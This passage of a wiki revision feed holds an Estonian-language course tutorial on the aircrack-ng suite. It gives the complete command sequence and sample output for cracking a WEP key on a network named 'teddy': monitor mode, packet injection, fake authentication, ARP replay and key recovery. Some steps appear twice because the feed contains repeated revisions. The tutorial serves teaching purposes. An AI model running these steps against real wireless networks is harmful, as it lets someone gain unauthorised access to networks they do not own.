 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89336</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89336"/>
		<updated>2015-05-25T20:00:43Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Sissejuhatus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
